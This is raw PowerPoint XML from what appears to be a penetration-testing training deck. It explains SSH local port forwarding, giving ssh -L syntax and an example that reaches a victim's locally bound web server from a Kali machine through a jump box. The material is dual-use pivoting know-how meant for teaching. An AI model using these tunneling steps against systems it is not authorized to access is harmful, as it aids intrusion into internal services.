                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB39F08C-728E-46C8-B3E7-913D8FC85C3D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="4794238" y="4354294"/>
                  <a:ext cx="1885950" cy="1885950"/>
                  <a:chOff x="5314594" y="2581275"/>
                  <a:chExt cx="1885950" cy="1885950"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="29" name="Rectangle 28">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B5CF323-430C-4722-B542-3B8D0F60A4F5}"/>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0" name="Graphic 29" descr="Monitor with solid fill">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E142A297-854E-40B6-AA15-70253B4D7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3" name="Graphic 22" descr="Monitor with solid fill">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEB3BE51-604C-4F8E-A70E-5101F90CB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6526" y="4354294"/>
                  <a:ext cx="1885950" cy="1885950"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="31" name="Group 30">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A0ED67D-8AF0-4AA6-BF84-5BFC1B2B8FD2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvGrpSpPr/>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr>
                <a:xfrm>
                  <a:off x="7991923" y="4354294"/>
                  <a:ext cx="1885950" cy="1885950"/>
                  <a:chOff x="5314594" y="2581275"/>
                  <a:chExt cx="1885950" cy="1885950"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="32" name="Rectangle 31">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A8BA8B4-41A5-4A32-A6B4-FA6EB0F1487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3" name="Graphic 32" descr="Monitor with solid fill">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE7826BC-A726-43D1-9CFE-825BBC9CDE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94" y="2581275"/>
                    <a:ext cx="1885950" cy="1885950"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </p:spPr>
              </p:pic>
            </p:grpSp>
          </p:grpSp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="37" name="Graphic 36" descr="Target outline">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85678B68-3F53-475F-875E-08644D3C66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4301" y="4792584"/>
                <a:ext cx="914400" cy="914400"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="41" name="Straight Connector 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3CA0E51-690B-4120-AA76-776066B6E1E8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="6841320" y="5280701"/>
              <a:ext cx="1382678" cy="19987"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="accent5">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A62BD8-BAFC-4FF5-9E4E-748C4EA4B63B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8797937" y="4957535"/>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80</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D5638D11-0062-484E-95B6-DFC60D4F2143}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4754135" y="5117068"/>
            <a:ext cx="441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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="36" name="Straight Connector 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{760ADC8F-C112-4BC7-BAD0-5A63315A9F25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3627460" y="5300688"/>
            <a:ext cx="1006684" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">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721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1BD62-8254-4B5F-A48F-3F6D2F16D3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3F75675-71A8-49E6-9E50-B22BF0EC4C91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40758104-89AB-4CEC-8C52-0045D8D5DFD2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="3590925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Quick Aside: “No freaking TTY”</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NfT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: backgrounds SSH, does not allocate a TTY, does not run a command on remote host</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Run the command on the host you want access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (often Kali)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>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-L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>localport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">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targ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etIP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">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targe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">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user@jumpbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Think of the syntax like a pipe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0"/>
              <a:t>(note that the tunnel is still bidirectional)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54F1EDFB-18DD-4D76-9E5E-848652A60922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2139867" y="5188744"/>
            <a:ext cx="7912267" cy="985837"/>
            <a:chOff x="1125340" y="5188744"/>
            <a:chExt cx="7912267" cy="985837"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1FE3DAB-6A26-4FD3-A65A-F32F1971D160}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3248025" y="5188744"/>
              <a:ext cx="5789582" cy="985837"/>
              <a:chOff x="3219450" y="5148262"/>
              <a:chExt cx="5789582" cy="985837"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Rectangle: Rounded Corners 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D98EF7C-AAFB-457E-ADA9-7589AF3AFEA6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4371975" y="5295900"/>
                <a:ext cx="2924175" cy="323850"/>
              </a:xfrm>
              <a:prstGeom prst="roundRect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg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SSH Tunnel </a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" sz="1800" b="1" i="0" u="sng" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:solidFill>
                      <a:srgbClr val="FFFFFF"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:uLnTx/>
                    <a:uFillTx/>
                    <a:latin typeface="Arial" panose="020B0604020202020204"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>TO</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Target</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="14" name="Group 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25F7099A-0D3C-44EF-AE67-5CD64812AAA7}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="7486649" y="5148262"/>
                <a:ext cx="966789" cy="619125"/>
                <a:chOff x="8362949" y="5148261"/>
                <a:chExt cx="966789" cy="619125"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="9" name="Rectangle 8">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D899C2F-1D1F-4231-81A5-68729CB6C73B}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9053513" y="5148261"/>
                  <a:ext cx="276225" cy="6191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Arrow: Right 10">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBCFFB8F-09DD-4ACB-8AAD-59EBF37DB79F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8362949" y="5295900"/>
                  <a:ext cx="571501" cy="32385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15" name="Group 14">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81D83DB9-0A5C-4950-BCFD-9701EE509191}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3219450" y="5176837"/>
                <a:ext cx="962026" cy="619125"/>
                <a:chOff x="2862262" y="5176837"/>
                <a:chExt cx="962026" cy="619125"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="12" name="Rectangle 11">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E947109-AD27-423D-904B-6D9F1593254F}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3548063" y="5176837"/>
                  <a:ext cx="276225" cy="619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Arrow: Right 12">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A328EC44-CB3B-47B9-920D-A4C11D7146E8}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="2862262" y="5324475"/>
                  <a:ext cx="547688" cy="3238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6" name="TextBox 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC150968-C53D-4B6B-8DB1-952AF12A687E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3440121" y="5764767"/>
                <a:ext cx="12064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Kali Port</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="17" name="TextBox 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5416C2F2-00DC-44CC-9710-72E103B74CCE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7621618" y="5759704"/>
                <a:ext cx="138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Target Port</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="TextBox 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F286D01-810E-4DB6-97FD-D5CFDCFF45E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1125340" y="5217319"/>
              <a:ext cx="1897554" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="38100">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SSH Command run here</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39979342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9CECED-DAEE-4410-92A5-020325A1F5E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5829300" y="3848311"/>
            <a:ext cx="6267450" cy="1739689"/>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98ADE4E3-EBB3-4F85-A09F-C35EF2AF96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E9A5E24-3759-4D1E-A2CD-5B2E63BF6F6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example – Local Port Open</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77D1FB03-98D5-409D-8C72-D8B700E50305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1152026"/>
            <a:ext cx="11338560" cy="1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client01 has a web server listening locally, SSH available with credentials</a:t>
            </a:r>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-L </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF000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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>127.0.0.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B05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brent@172.16.100.150</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8588914F-2AB8-4D00-BB0F-36E705A5D381}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3792693" y="2029694"/>
            <a:ext cx="6650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Kali port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D2D9E5B-5C3F-4D85-ACDD-BE21BCB06BE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4393248" y="1934954"/>
            <a:ext cx="180530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Where to forward traffic to/from</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA73077A-9433-4AA0-87E9-E06E0540E49C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6134100" y="1985761"/>
            <a:ext cx="6650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Vic port</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2FE1875-2C5A-4F5D-8B61-028424EE1D85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="38411"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="284797" y="3956231"/>
            <a:ext cx="5221605" cy="777307"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA571CAD-B8B9-4988-BE90-DDD0B77E32F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="18174"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="284797" y="3061588"/>
            <a:ext cx="5221605" cy="843836"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90412BEA-5088-4F56-9D5A-8C959B681847}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect r="12147"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="4125309"/>
            <a:ext cx="6038850" cy="1059272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3AC02A-3E72-4906-A511-A82204C405A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104775" y="2909091"/>
            <a:ext cx="5543550" cy="321471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4CCD0FF7-FE73-4996-9241-C7FC20774E68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7199253" y="2029694"/>
            <a:ext cx="27693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Jump box, in this case the same as victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{241331FB-D4B0-4952-86E8-3636C9829349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="689193" y="4784345"/>
            <a:ext cx="4374713" cy="1258631"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
